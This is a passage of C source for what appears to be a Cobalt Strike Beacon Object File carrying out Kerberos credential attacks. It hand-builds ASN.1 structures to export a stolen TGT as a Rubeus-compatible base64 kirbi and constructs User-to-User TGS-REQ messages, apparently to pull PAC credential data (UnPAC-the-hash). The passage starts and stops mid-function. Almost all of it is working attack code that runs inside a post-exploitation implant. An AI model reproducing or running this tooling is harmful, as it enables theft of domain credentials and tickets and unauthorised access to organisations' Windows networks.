KERB_CHECKSUM_Finalize finalizeFunc = (KERB_CHECKSUM_Finalize)pCheckSum->Finalize;
KERB_CHECKSUM_Finish finishFunc = (KERB_CHECKSUM_Finish)pCheckSum->Finish;
/* Initialize with key */
status = initExFunc(key, keyLen, keyUsage, &pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum InitializeEx failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Sum the data */
status = sumFunc(pContext, dataLen, data);
if (status != 0) {
finishFunc(&pContext);
BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum Sum failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Finalize */
*checksumLen = pCheckSum->Size;
output = (BYTE*)malloc(*checksumLen);
status = finalizeFunc(pContext, output);
finishFunc(&pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum Finalize failed: 0x%X", status);
free(output);
FreeLibrary(hCryptDll);
return NULL;
}
FreeLibrary(hCryptDll);
return output;
}
/*
* =============================================================================
* U2U - Forward Declarations
* =============================================================================
*/
/* Forward declarations for functions defined later */
static BYTE* ExtractPacFromAuthData(BYTE* authData, int authDataLen, int* pacLen);
static const char* GetKrbErrorDesc(int code);
static void ParsePacCredentialData(BYTE* data, int dataLen);
/*
* =============================================================================
* KRB-CRED (kirbi) Builder - Rubeus compatible output
* =============================================================================
*/
static void OutputKirbi(BYTE* ticket, int ticketLen, BYTE* sessionKey, int sessionKeyLen,
int encType, const char* user, const char* realm) {
/*
* Build minimal KRB-CRED structure for TGT export
* KRB-CRED ::= [APPLICATION 22] SEQUENCE {
* pvno [0] INTEGER (5),
* msg-type [1] INTEGER (22),
* tickets [2] SEQUENCE OF Ticket,
* enc-part [3] EncryptedData { etype 0, cipher: EncKrbCredPart }
* }
*/
BYTE* kirbi = (BYTE*)malloc(ticketLen + sessionKeyLen + 1024);
int kOffset = 0;
int i;
char* b64 = NULL;
DWORD b64Len = 0;
/* Build KrbCredInfo */
BYTE* credInfo = (BYTE*)malloc(sessionKeyLen + 512);
int ciOffset = 0;
/* key [0] EncryptionKey { etype [0], keyvalue [1] } */
BYTE keyContent[64];
int keyOffset = 0;
/* etype */
keyContent[keyOffset++] = 0xA0;
keyContent[keyOffset++] = 0x03;
keyContent[keyOffset++] = 0x02;
keyContent[keyOffset++] = 0x01;
keyContent[keyOffset++] = (BYTE)encType;
/* keyvalue */
keyContent[keyOffset++] = 0xA1;
keyContent[keyOffset++] = (BYTE)(sessionKeyLen + 2);
keyContent[keyOffset++] = 0x04;
keyContent[keyOffset++] = (BYTE)sessionKeyLen;
memcpy(keyContent + keyOffset, sessionKey, sessionKeyLen);
keyOffset += sessionKeyLen;
credInfo[ciOffset++] = 0xA0; /* [0] key */
credInfo[ciOffset++] = (BYTE)(keyOffset + 2);
credInfo[ciOffset++] = 0x30;
credInfo[ciOffset++] = (BYTE)keyOffset;
memcpy(credInfo + ciOffset, keyContent, keyOffset);
ciOffset += keyOffset;
/* prealm [1] */
int realmLen = (int)strlen(realm);
credInfo[ciOffset++] = 0xA1;
credInfo[ciOffset++] = (BYTE)(realmLen + 2);
credInfo[ciOffset++] = 0x1B; /* GeneralString */
credInfo[ciOffset++] = (BYTE)realmLen;
memcpy(credInfo + ciOffset, realm, realmLen);
ciOffset += realmLen;
/* pname [2] PrincipalName { name-type [0] = 1, name-string [1] } */
int userLen = (int)strlen(user);
BYTE pnameContent[128];
int pnOffset = 0;
pnameContent[pnOffset++] = 0xA0;
pnameContent[pnOffset++] = 0x03;
pnameContent[pnOffset++] = 0x02;
pnameContent[pnOffset++] = 0x01;
pnameContent[pnOffset++] = 0x01; /* NT-PRINCIPAL */
pnameContent[pnOffset++] = 0xA1;
pnameContent[pnOffset++] = (BYTE)(userLen + 4);
pnameContent[pnOffset++] = 0x30;
pnameContent[pnOffset++] = (BYTE)(userLen + 2);
pnameContent[pnOffset++] = 0x1B;
pnameContent[pnOffset++] = (BYTE)userLen;
memcpy(pnameContent + pnOffset, user, userLen);
pnOffset += userLen;
credInfo[ciOffset++] = 0xA2;
credInfo[ciOffset++] = (BYTE)(pnOffset + 2);
credInfo[ciOffset++] = 0x30;
credInfo[ciOffset++] = (BYTE)pnOffset;
memcpy(credInfo + ciOffset, pnameContent, pnOffset);
ciOffset += pnOffset;
/* srealm [8] */
credInfo[ciOffset++] = 0xA8;
credInfo[ciOffset++] = (BYTE)(realmLen + 2);
credInfo[ciOffset++] = 0x1B;
credInfo[ciOffset++] = (BYTE)realmLen;
memcpy(credInfo + ciOffset, realm, realmLen);
ciOffset += realmLen;
/* sname [9] krbtgt/REALM */
BYTE snameContent[128];
int snOffset = 0;
snameContent[snOffset++] = 0xA0;
snameContent[snOffset++] = 0x03;
snameContent[snOffset++] = 0x02;
snameContent[snOffset++] = 0x01;
snameContent[snOffset++] = 0x02; /* NT-SRV-INST */
snameContent[snOffset++] = 0xA1;
snameContent[snOffset++] = (BYTE)(6 + 2 + realmLen + 2 + 2);
snameContent[snOffset++] = 0x30;
snameContent[snOffset++] = (BYTE)(6 + 2 + realmLen + 2);
snameContent[snOffset++] = 0x1B;
snameContent[snOffset++] = 0x06;
memcpy(snameContent + snOffset, "krbtgt", 6);
snOffset += 6;
snameContent[snOffset++] = 0x1B;
snameContent[snOffset++] = (BYTE)realmLen;
memcpy(snameContent + snOffset, realm, realmLen);
snOffset += realmLen;
credInfo[ciOffset++] = 0xA9;
credInfo[ciOffset++] = (BYTE)(snOffset + 2);
credInfo[ciOffset++] = 0x30;
credInfo[ciOffset++] = (BYTE)snOffset;
memcpy(credInfo + ciOffset, snameContent, snOffset);
ciOffset += snOffset;
/* Build EncKrbCredPart [APPLICATION 29] */
BYTE* encCredPart = (BYTE*)malloc(ciOffset + 64);
int ecpOffset = 0;
/* ticket-info [0] SEQUENCE OF KrbCredInfo */
encCredPart[ecpOffset++] = 0xA0;
int seqLen = ciOffset + 2;
if (seqLen < 128) {
encCredPart[ecpOffset++] = (BYTE)seqLen;
} else {
encCredPart[ecpOffset++] = 0x82;
encCredPart[ecpOffset++] = (BYTE)(seqLen >> 8);
encCredPart[ecpOffset++] = (BYTE)(seqLen & 0xFF);
}
encCredPart[ecpOffset++] = 0x30; /* SEQUENCE OF */
if (ciOffset < 128) {
encCredPart[ecpOffset++] = (BYTE)ciOffset;
} else {
encCredPart[ecpOffset++] = 0x82;
encCredPart[ecpOffset++] = (BYTE)(ciOffset >> 8);
encCredPart[ecpOffset++] = (BYTE)(ciOffset & 0xFF);
}
/* KrbCredInfo SEQUENCE */
int credInfoSeqOffset = ecpOffset;
encCredPart[ecpOffset++] = 0x30;
if (ciOffset < 128) {
encCredPart[ecpOffset++] = (BYTE)ciOffset;
} else {
encCredPart[ecpOffset++] = 0x82;
encCredPart[ecpOffset++] = (BYTE)(ciOffset >> 8);
encCredPart[ecpOffset++] = (BYTE)(ciOffset & 0xFF);
}
memcpy(encCredPart + ecpOffset, credInfo, ciOffset);
ecpOffset += ciOffset;
/* Wrap in [APPLICATION 29] */
BYTE* app29 = (BYTE*)malloc(ecpOffset + 8);
int a29Offset = 0;
app29[a29Offset++] = 0x7D; /* [APPLICATION 29] */
if (ecpOffset + 2 < 128) {
app29[a29Offset++] = (BYTE)(ecpOffset + 2);
} else {
app29[a29Offset++] = 0x82;
app29[a29Offset++] = (BYTE)((ecpOffset + 2) >> 8);
app29[a29Offset++] = (BYTE)((ecpOffset + 2) & 0xFF);
}
app29[a29Offset++] = 0x30;
if (ecpOffset < 128) {
app29[a29Offset++] = (BYTE)ecpOffset;
} else {
app29[a29Offset++] = 0x82;
app29[a29Offset++] = (BYTE)(ecpOffset >> 8);
app29[a29Offset++] = (BYTE)(ecpOffset & 0xFF);
}
memcpy(app29 + a29Offset, encCredPart, ecpOffset);
a29Offset += ecpOffset;
/* Build enc-part EncryptedData { etype [0] = 0, cipher [2] } */
BYTE* encPart = (BYTE*)malloc(a29Offset + 32);
int epOffset = 0;
/* etype [0] INTEGER 0 */
encPart[epOffset++] = 0xA0;
encPart[epOffset++] = 0x03;
encPart[epOffset++] = 0x02;
encPart[epOffset++] = 0x01;
encPart[epOffset++] = 0x00;
/* cipher [2] OCTET STRING */
encPart[epOffset++] = 0xA2;
if (a29Offset + 2 < 128) {
encPart[epOffset++] = (BYTE)(a29Offset + 2);
} else {
encPart[epOffset++] = 0x82;
encPart[epOffset++] = (BYTE)((a29Offset + 2) >> 8);
encPart[epOffset++] = (BYTE)((a29Offset + 2) & 0xFF);
}
encPart[epOffset++] = 0x04;
if (a29Offset < 128) {
encPart[epOffset++] = (BYTE)a29Offset;
} else {
encPart[epOffset++] = 0x82;
encPart[epOffset++] = (BYTE)(a29Offset >> 8);
encPart[epOffset++] = (BYTE)(a29Offset & 0xFF);
}
memcpy(encPart + epOffset, app29, a29Offset);
epOffset += a29Offset;
/* Wrap enc-part in SEQUENCE */
BYTE* encPartSeq = (BYTE*)malloc(epOffset + 8);
int epsOffset = 0;
encPartSeq[epsOffset++] = 0x30;
if (epOffset < 128) {
encPartSeq[epsOffset++] = (BYTE)epOffset;
} else {
encPartSeq[epsOffset++] = 0x82;
encPartSeq[epsOffset++] = (BYTE)(epOffset >> 8);
encPartSeq[epsOffset++] = (BYTE)(epOffset & 0xFF);
}
memcpy(encPartSeq + epsOffset, encPart, epOffset);
epsOffset += epOffset;
/* Build KRB-CRED body */
/* pvno [0] INTEGER 5 */
kirbi[kOffset++] = 0xA0;
kirbi[kOffset++] = 0x03;
kirbi[kOffset++] = 0x02;
kirbi[kOffset++] = 0x01;
kirbi[kOffset++] = 0x05;
/* msg-type [1] INTEGER 22 */
kirbi[kOffset++] = 0xA1;
kirbi[kOffset++] = 0x03;
kirbi[kOffset++] = 0x02;
kirbi[kOffset++] = 0x01;
kirbi[kOffset++] = 0x16;
/* tickets [2] SEQUENCE OF Ticket */
kirbi[kOffset++] = 0xA2;
if (ticketLen + 2 < 128) {
kirbi[kOffset++] = (BYTE)(ticketLen + 2);
} else {
kirbi[kOffset++] = 0x82;
kirbi[kOffset++] = (BYTE)((ticketLen + 2) >> 8);
kirbi[kOffset++] = (BYTE)((ticketLen + 2) & 0xFF);
}
kirbi[kOffset++] = 0x30;
if (ticketLen < 128) {
kirbi[kOffset++] = (BYTE)ticketLen;
} else {
kirbi[kOffset++] = 0x82;
kirbi[kOffset++] = (BYTE)(ticketLen >> 8);
kirbi[kOffset++] = (BYTE)(ticketLen & 0xFF);
}
memcpy(kirbi + kOffset, ticket, ticketLen);
kOffset += ticketLen;
/* enc-part [3] */
kirbi[kOffset++] = 0xA3;
if (epsOffset < 128) {
kirbi[kOffset++] = (BYTE)epsOffset;
} else {
kirbi[kOffset++] = 0x82;
kirbi[kOffset++] = (BYTE)(epsOffset >> 8);
kirbi[kOffset++] = (BYTE)(epsOffset & 0xFF);
}
memcpy(kirbi + kOffset, encPartSeq, epsOffset);
kOffset += epsOffset;
/* Wrap in SEQUENCE and [APPLICATION 22] */
BYTE* final = (BYTE*)malloc(kOffset + 16);
int fOffset = 0;
final[fOffset++] = 0x76; /* [APPLICATION 22] */
if (kOffset + 2 < 128) {
final[fOffset++] = (BYTE)(kOffset + 2);
} else {
final[fOffset++] = 0x82;
final[fOffset++] = (BYTE)((kOffset + 2) >> 8);
final[fOffset++] = (BYTE)((kOffset + 2) & 0xFF);
}
final[fOffset++] = 0x30;
if (kOffset < 128) {
final[fOffset++] = (BYTE)kOffset;
} else {
final[fOffset++] = 0x82;
final[fOffset++] = (BYTE)(kOffset >> 8);
final[fOffset++] = (BYTE)(kOffset & 0xFF);
}
memcpy(final + fOffset, kirbi, kOffset);
fOffset += kOffset;
/* Convert to base64 */
CryptBinaryToStringA(final, fOffset, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &b64Len);
b64 = (char*)malloc(b64Len + 1);
CryptBinaryToStringA(final, fOffset, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64, &b64Len);
BeaconPrintf(CALLBACK_OUTPUT, "[+] TGT (kirbi, base64):");
BeaconPrintf(CALLBACK_OUTPUT, "%s", b64);
free(b64);
free(final);
free(kirbi);
free(credInfo);
free(encCredPart);
free(app29);
free(encPart);
free(encPartSeq);
}
/*
* =============================================================================
* U2U - Extract Ticket from AS-REP
* =============================================================================
*/
static BYTE* ExtractTicketFromAsRep(BYTE* asRep, int asRepLen, int* ticketLen) {
int offset = 0;
int length;
/* Skip APPLICATION 11 tag */
if (asRep[offset] == 0x6B) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Skip outer SEQUENCE */
if (asRep[offset] == 0x30) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Find ticket [5] */
while (offset < asRepLen - 10) {
if (asRep[offset] == 0xA5) {
offset++;
offset += DecodeLength(asRep, offset, &length);
/* The ticket starts here (APPLICATION 1) */
*ticketLen = length;
BYTE* ticket = (BYTE*)malloc(length);
memcpy(ticket, asRep + offset, length);
return ticket;
} else if ((asRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(asRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
*ticketLen = 0;
return NULL;
}
/*
* =============================================================================
* U2U - Build TGS-REQ Structures
* =============================================================================
*/
/* Key usages for U2U */
#define KRB_KEY_USAGE_TGS_REQ_AUTH_CKSUM 6
#define KRB_KEY_USAGE_TGS_REQ_AUTH 7
#define KRB_KEY_USAGE_TGS_REP_ENCPART_SESSKEY 8
#define KRB_KEY_USAGE_TICKET_ENCPART 2
/* Global storage for U2U */
static BYTE* g_lastTgt = NULL;
static int g_lastTgtLen = 0;
static char g_lastUser[256] = {0};
static char g_lastRealm[256] = {0};
static char g_lastKdc[256] = {0};
/* Build U2U Authenticator */
static BYTE* BuildU2UAuthenticator(const char* user, const char* realm, BYTE* sessionKey, int sessionKeyLen,
BYTE* reqBody, int reqBodyLen, int* outLen) {
BYTE* authContent = (BYTE*)malloc(4096);
int offset = 0;
int i;
/* authenticator-vno [0] INTEGER 5 */
int vnoLen;
BYTE* vno = BuildInteger(5, &vnoLen);
int vnoTagLen;
BYTE* vnoTag = BuildContextTag(0, vno, vnoLen, &vnoTagLen);
memcpy(authContent + offset, vnoTag, vnoTagLen);
offset += vnoTagLen;
free(vno);
free(vnoTag);
/* crealm [1] GeneralString */
int realmStrLen;
BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
int realmTagLen;
BYTE* realmTag = BuildContextTag(1, realmStr, realmStrLen, &realmTagLen);
memcpy(authContent + offset, realmTag, realmTagLen);
offset += realmTagLen;
free(realmStr);
free(realmTag);
/* cname [2] PrincipalName */
int cnameLen;
BYTE* cname = BuildPrincipalName(1, user, NULL, &cnameLen);
int cnameTagLen;
BYTE* cnameTag = BuildContextTag(2, cname, cnameLen, &cnameTagLen);
memcpy(authContent + offset, cnameTag, cnameTagLen);
offset += cnameTagLen;
free(cname);
free(cnameTag);
/* cksum [3] Checksum - checksum of req-body */
/* Checksum ::= SEQUENCE { cksumtype [0] Int32, checksum [1] OCTET STRING } */
int checksumValueLen;
BYTE* checksumValue = ComputeKerberosChecksum(sessionKey, sessionKeyLen, reqBody, reqBodyLen,
KRB_KEY_USAGE_TGS_REQ_AUTH_CKSUM, &checksumValueLen);
if (checksumValue) {
BYTE cksumContent[64];
int cksumOffset = 0;
/* cksumtype [0] INTEGER 16 */
int ctypeLen;
BYTE* ctype = BuildInteger(KERB_CHECKSUM_HMAC_SHA1_96_AES256, &ctypeLen);
int ctypeTagLen;
BYTE* ctypeTag = BuildContextTag(0, ctype, ctypeLen, &ctypeTagLen);
memcpy(cksumContent + cksumOffset, ctypeTag, ctypeTagLen);
cksumOffset += ctypeTagLen;
free(ctype);
free(ctypeTag);
/* checksum [1] OCTET STRING */
int cvalLen;
BYTE* cval = BuildOctetString(checksumValue, checksumValueLen, &cvalLen);
int cvalTagLen;
BYTE* cvalTag = BuildContextTag(1, cval, cvalLen, &cvalTagLen);
memcpy(cksumContent + cksumOffset, cvalTag, cvalTagLen);
cksumOffset += cvalTagLen;
free(cval);
free(cvalTag);
free(checksumValue);
int cksumSeqLen;
BYTE* cksumSeq = BuildSequence(cksumContent, cksumOffset, &cksumSeqLen);
int cksumTagLen;
BYTE* cksumTag = BuildContextTag(3, cksumSeq, cksumSeqLen, &cksumTagLen);
memcpy(authContent + offset, cksumTag, cksumTagLen);
offset += cksumTagLen;
free(cksumSeq);
free(cksumTag);
}
/* cusec [4] Microseconds */
SYSTEMTIME st;
GetSystemTime(&st);
int cusec = st.wMilliseconds * 1000;
int cusecLen;
BYTE* cusecInt = BuildInteger(cusec, &cusecLen);
int cusecTagLen;
BYTE* cusecTag = BuildContextTag(4, cusecInt, cusecLen, &cusecTagLen);
memcpy(authContent + offset, cusecTag, cusecTagLen);
offset += cusecTagLen;
free(cusecInt);
free(cusecTag);
/* ctime [5] KerberosTime */
char timeStr[32];
sprintf(timeStr, "%04d%02d%02d%02d%02d%02dZ",
st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
int ctimeLen;
BYTE* ctime = BuildGeneralizedTime(timeStr, &ctimeLen);
int ctimeTagLen;
BYTE* ctimeTag = BuildContextTag(5, ctime, ctimeLen, &ctimeTagLen);
memcpy(authContent + offset, ctimeTag, ctimeTagLen);
offset += ctimeTagLen;
free(ctime);
free(ctimeTag);
/* Build Authenticator SEQUENCE */
int authSeqLen;
BYTE* authSeq = BuildSequence(authContent, offset, &authSeqLen);
free(authContent);
/* Wrap in APPLICATION 2 */
BYTE* result = BuildApplication(2, authSeq, authSeqLen, outLen);
free(authSeq);
return result;
}
/* Build U2U AP-REQ */
static BYTE* BuildU2UApReq(BYTE* ticket, int ticketLen, BYTE* encAuthenticator, int encAuthLen, int* outLen) {
BYTE* apReqContent = (BYTE*)malloc(ticketLen + encAuthLen + 256);
int offset = 0;
/* pvno [0] INTEGER 5 */
int pvnoLen;
BYTE* pvno = BuildInteger(5, &pvnoLen);
int pvnoTagLen;
BYTE* pvnoTag = BuildContextTag(0, pvno, pvnoLen, &pvnoTagLen);
memcpy(apReqContent + offset, pvnoTag, pvnoTagLen);
offset += pvnoTagLen;
free(pvno);
free(pvnoTag);
/* msg-type [1] INTEGER 14 (AP-REQ) */
int mtLen;
BYTE* mt = BuildInteger(14, &mtLen);
int mtTagLen;
BYTE* mtTag = BuildContextTag(1, mt, mtLen, &mtTagLen);
memcpy(apReqContent + offset, mtTag, mtTagLen);
offset += mtTagLen;
free(mt);
free(mtTag);
/* ap-options [2] BIT STRING (no options) */
BYTE apOptions[] = { 0x00, 0x00, 0x00, 0x00 };
int apOptBsLen;
BYTE* apOptBs = BuildBitString(apOptions, 4, &apOptBsLen);
int apOptTagLen;
BYTE* apOptTag = BuildContextTag(2, apOptBs, apOptBsLen, &apOptTagLen);
memcpy(apReqContent + offset, apOptTag, apOptTagLen);
offset += apOptTagLen;
free(apOptBs);
free(apOptTag);
/* ticket [3] Ticket */
int ticketTagLen;
BYTE* ticketTag = BuildContextTag(3, ticket, ticketLen, &ticketTagLen);
memcpy(apReqContent + offset, ticketTag, ticketTagLen);
offset += ticketTagLen;
free(ticketTag);
/* authenticator [4] EncryptedData */
/* EncryptedData ::= SEQUENCE { etype [0], cipher [2] } */
static BYTE encDataContent[4096]; /* static to avoid BOF stack overflow */
int edOffset = 0;
/* etype [0] INTEGER 18 (AES256) */
int etypeLen;
BYTE* etype = BuildInteger(ETYPE_AES256_CTS_HMAC_SHA1, &etypeLen);
int etypeTagLen;
BYTE* etypeTag = BuildContextTag(0, etype, etypeLen, &etypeTagLen);
memcpy(encDataContent + edOffset, etypeTag, etypeTagLen);
edOffset += etypeTagLen;
free(etype);
free(etypeTag);
/* cipher [2] OCTET STRING */
int cipherLen;
BYTE* cipher = BuildOctetString(encAuthenticator, encAuthLen, &cipherLen);
int cipherTagLen;
BYTE* cipherTag = BuildContextTag(2, cipher, cipherLen, &cipherTagLen);
memcpy(encDataContent + edOffset, cipherTag, cipherTagLen);
edOffset += cipherTagLen;
free(cipher);
free(cipherTag);
int encDataSeqLen;
BYTE* encDataSeq = BuildSequence(encDataContent, edOffset, &encDataSeqLen);
int encDataTagLen;
BYTE* encDataTag = BuildContextTag(4, encDataSeq, encDataSeqLen, &encDataTagLen);
memcpy(apReqContent + offset, encDataTag, encDataTagLen);
offset += encDataTagLen;
free(encDataSeq);
free(encDataTag);
/* Build AP-REQ SEQUENCE */
int apReqSeqLen;
BYTE* apReqSeq = BuildSequence(apReqContent, offset, &apReqSeqLen);
free(apReqContent);
/* Wrap in APPLICATION 14 */
BYTE* result = BuildApplication(14, apReqSeq, apReqSeqLen, outLen);
free(apReqSeq);
return result;
}
/* Build U2U TGS-REQ */
static BYTE* BuildU2UTgsReq(const char* user, const char* realm, BYTE* ticket, int ticketLen,
BYTE* sessionKey, int sessionKeyLen, int* outLen) {
BYTE* reqBodyContent = (BYTE*)malloc(4096);
int rbOffset = 0;
int i;
/* kdc-options [0] BIT STRING */
/* 0x40810018 = forwardable, renewable, canonicalize, renewable-ok, enc-tkt-in-skey */
BYTE kdcOptions[] = { 0x40, 0x81, 0x00, 0x18 };
int kdcOptBsLen;
BYTE* kdcOptBs = BuildBitString(kdcOptions, 4, &kdcOptBsLen);
int kdcOptTagLen;
BYTE* kdcOptTag = BuildContextTag(0, kdcOptBs, kdcOptBsLen, &kdcOptTagLen);
memcpy(reqBodyContent + rbOffset, kdcOptTag, kdcOptTagLen);
rbOffset += kdcOptTagLen;
free(kdcOptBs);
free(kdcOptTag);
/* realm [2] Realm */
int realmStrLen;
BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
int realmTagLen;
BYTE* realmTag = BuildContextTag(2, realmStr, realmStrLen, &realmTagLen);
memcpy(reqBodyContent + rbOffset, realmTag, realmTagLen);
rbOffset += realmTagLen;
free(realmStr);
free(realmTag);
/* sname [3] PrincipalName - target is ourselves */
int snameLen;
BYTE* sname = BuildPrincipalName(1, user, NULL, &snameLen);
int snameTagLen;
BYTE* snameTag = BuildContextTag(3, sname, snameLen, &snameTagLen);
memcpy(reqBodyContent + rbOffset, snameTag, snameTagLen);
rbOffset += snameTagLen;
free(sname);
free(snameTag);
/* till [5] KerberosTime - tomorrow */
SYSTEMTIME st;
GetSystemTime(&st);
char tillStr[32];
sprintf(tillStr, "%04d%02d%02d%02d%02d%02dZ",
st.wYear, st.wMonth, st.wDay + 1, st.wHour, st.wMinute, st.wSecond);
int tillLen;
BYTE* till = BuildGeneralizedTime(tillStr, &tillLen);
int tillTagLen;
BYTE* tillTag = BuildContextTag(5, till, tillLen, &tillTagLen);
memcpy(reqBodyContent + rbOffset, tillTag, tillTagLen);
rbOffset += tillTagLen;
free(till);
free(tillTag);
/* nonce [7] UInt32 */
int nonce = g_nonce + 1;
int nonceLen;
BYTE* nonceInt = BuildInteger(nonce, &nonceLen);
int nonceTagLen;
BYTE* nonceTag = BuildContextTag(7, nonceInt, nonceLen, &nonceTagLen);
memcpy(reqBodyContent + rbOffset, nonceTag, nonceTagLen);
rbOffset += nonceTagLen;
free(nonceInt);
free(nonceTag);
/* etype [8] SEQUENCE OF Int32 */
BYTE etypeContent[32];
int etOffset = 0;
int aes256Len, aes128Len, rc4Len;
BYTE* aes256 = BuildInteger(18, &aes256Len);
memcpy(etypeContent + etOffset, aes256, aes256Len);
etOffset += aes256Len;
free(aes256);
BYTE* aes128 = BuildInteger(17, &aes128Len);
memcpy(etypeContent + etOffset, aes128, aes128Len);
etOffset += aes128Len;
free(aes128);
BYTE* rc4 = BuildInteger(23, &rc4Len);
memcpy(etypeContent + etOffset, rc4, rc4Len);
etOffset += rc4Len;
free(rc4);
int etypeSeqLen;
BYTE* etypeSeq = BuildSequence(etypeContent, etOffset, &etypeSeqLen);
int etypeTagLen;
BYTE* etypeTag = BuildContextTag(8, etypeSeq, etypeSeqLen, &etypeTagLen);
memcpy(reqBodyContent + rbOffset, etypeTag, etypeTagLen);
rbOffset += etypeTagLen;
free(etypeSeq);
free(etypeTag);
/* additional-tickets [11] SEQUENCE OF Ticket - our TGT for U2U */
int addTicketsSeqLen;
BYTE* addTicketsSeq = BuildSequence(ticket, ticketLen, &addTicketsSeqLen);
int addTicketsTagLen;
BYTE* addTicketsTag = BuildContextTag(11, addTicketsSeq, addTicketsSeqLen, &addTicketsTagLen);
memcpy(reqBodyContent + rbOffset, addTicketsTag, addTicketsTagLen);
rbOffset += addTicketsTagLen;
free(addTicketsSeq);
free(addTicketsTag);
/* Build req-body SEQUENCE */
int reqBodySeqLen;
BYTE* reqBodySeq = BuildSequence(reqBodyContent, rbOffset, &reqBodySeqLen);
free(reqBodyContent);
/* Build Authenticator with checksum of req-body */
int authenticatorLen;
BYTE* authenticator = BuildU2UAuthenticator(user, realm, sessionKey, sessionKeyLen,
reqBodySeq, reqBodySeqLen, &authenticatorLen);
if (!authenticator) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U authenticator");
free(reqBodySeq);
return NULL;
}
/* Encrypt authenticator with session key (key usage 7) */
int encAuthLen;
BYTE* encAuth = KerberosEncrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_TGS_REQ_AUTH,
sessionKey, sessionKeyLen, authenticator, authenticatorLen, &encAuthLen);
free(authenticator);
if (!encAuth) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to encrypt U2U authenticator");
free(reqBodySeq);
return NULL;
}
/* Build AP-REQ */
int apReqLen;
BYTE* apReq = BuildU2UApReq(ticket, ticketLen, encAuth, encAuthLen, &apReqLen);
free(encAuth);
if (!apReq) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U AP-REQ");
free(reqBodySeq);
return NULL;
}
/* Build PA-TGS-REQ (padata-type 1) */
static BYTE padataContent[4096]; /* static to avoid BOF stack overflow */
int paOffset = 0;
/* padata-type [1] INTEGER 1 */
int ptLen;
BYTE* pt = BuildInteger(1, &ptLen);
int ptTagLen;
BYTE* ptTag = BuildContextTag(1, pt, ptLen, &ptTagLen);
memcpy(padataContent + paOffset, ptTag, ptTagLen);
paOffset += ptTagLen;
free(pt);
free(ptTag);
/* padata-value [2] OCTET STRING (AP-REQ) */
int pvLen;
BYTE* pv = BuildOctetString(apReq, apReqLen, &pvLen);
int pvTagLen;
BYTE* pvTag = BuildContextTag(2, pv, pvLen, &pvTagLen);
memcpy(padataContent + paOffset, pvTag, pvTagLen);
paOffset += pvTagLen;
free(pv);
free(pvTag);
free(apReq);
int padataSeqLen;
BYTE* padataSeq = BuildSequence(padataContent, paOffset, &padataSeqLen);
/* padata [3] SEQUENCE OF PA-DATA */
int padataOuterSeqLen;
BYTE* padataOuterSeq = BuildSequence(padataSeq, padataSeqLen, &padataOuterSeqLen);
free(padataSeq);
int padataTagLen;
BYTE* padataTag = BuildContextTag(3, padataOuterSeq, padataOuterSeqLen, &padataTagLen);
free(padataOuterSeq);
/* Build TGS-REQ */
static BYTE tgsReqContent[8192]; /* static to avoid BOF stack overflow */
int tgsOffset = 0;
/* pvno [1] INTEGER 5 */
int pvnoLen;
BYTE* pvno = BuildInteger(5, &pvnoLen);
int pvnoTagLen;
BYTE* pvnoTag = BuildContextTag(1, pvno, pvnoLen, &pvnoTagLen);
memcpy(tgsReqContent + tgsOffset, pvnoTag, pvnoTagLen);
tgsOffset += pvnoTagLen;
free(pvno);
free(pvnoTag);
/* msg-type [2] INTEGER 12 (TGS-REQ) */
int mtLen;
BYTE* mt = BuildInteger(12, &mtLen);
int mtTagLen;
BYTE* mtTag = BuildContextTag(2, mt, mtLen, &mtTagLen);
memcpy(tgsReqContent + tgsOffset, mtTag, mtTagLen);
tgsOffset += mtTagLen;
free(mt);
free(mtTag);
/* padata [3] */
memcpy(tgsReqContent + tgsOffset, padataTag, padataTagLen);
tgsOffset += padataTagLen;
free(padataTag);
/* req-body [4] */
int reqBodyTagLen;
BYTE* reqBodyTag = BuildContextTag(4, reqBodySeq, reqBodySeqLen, &reqBodyTagLen);
memcpy(tgsReqContent + tgsOffset, reqBodyTag, reqBodyTagLen);
tgsOffset += reqBodyTagLen;
free(reqBodyTag);
free(reqBodySeq);
/* Build TGS-REQ SEQUENCE */
int tgsReqSeqLen;
BYTE* tgsReqSeq = BuildSequence(tgsReqContent, tgsOffset, &tgsReqSeqLen);
/* Wrap in APPLICATION 12 */
BYTE* result = BuildApplication(12, tgsReqSeq, tgsReqSeqLen, outLen);
free(tgsReqSeq);
return result;
}
/*
* =============================================================================
* U2U - TGS-REP Processing
* =============================================================================
*/
/* Extract ticket enc-part cipher from TGS-REP ticket */
static BYTE* ExtractTicketEncPartFromTgsRep(BYTE* tgsRep, int tgsRepLen, int* cipherLen) {
int offset = 0;
int length;
/* Skip APPLICATION 13 */
if (tgsRep[offset] == 0x6D) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
}
/* Skip outer SEQUENCE */
if (tgsRep[offset] == 0x30) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
}
/* Find ticket [5] */
while (offset < tgsRepLen - 10) {
if (tgsRep[offset] == 0xA5) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
int ticketEnd = offset + length;
/* Skip APPLICATION 1 if present */
if (tgsRep[offset] == 0x61) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
}
/* Skip SEQUENCE */
if (tgsRep[offset] == 0x30) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
}
/* Find enc-part [3] in ticket */
while (offset < ticketEnd - 10) {
if (tgsRep[offset] == 0xA3) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
/* EncryptedData SEQUENCE */
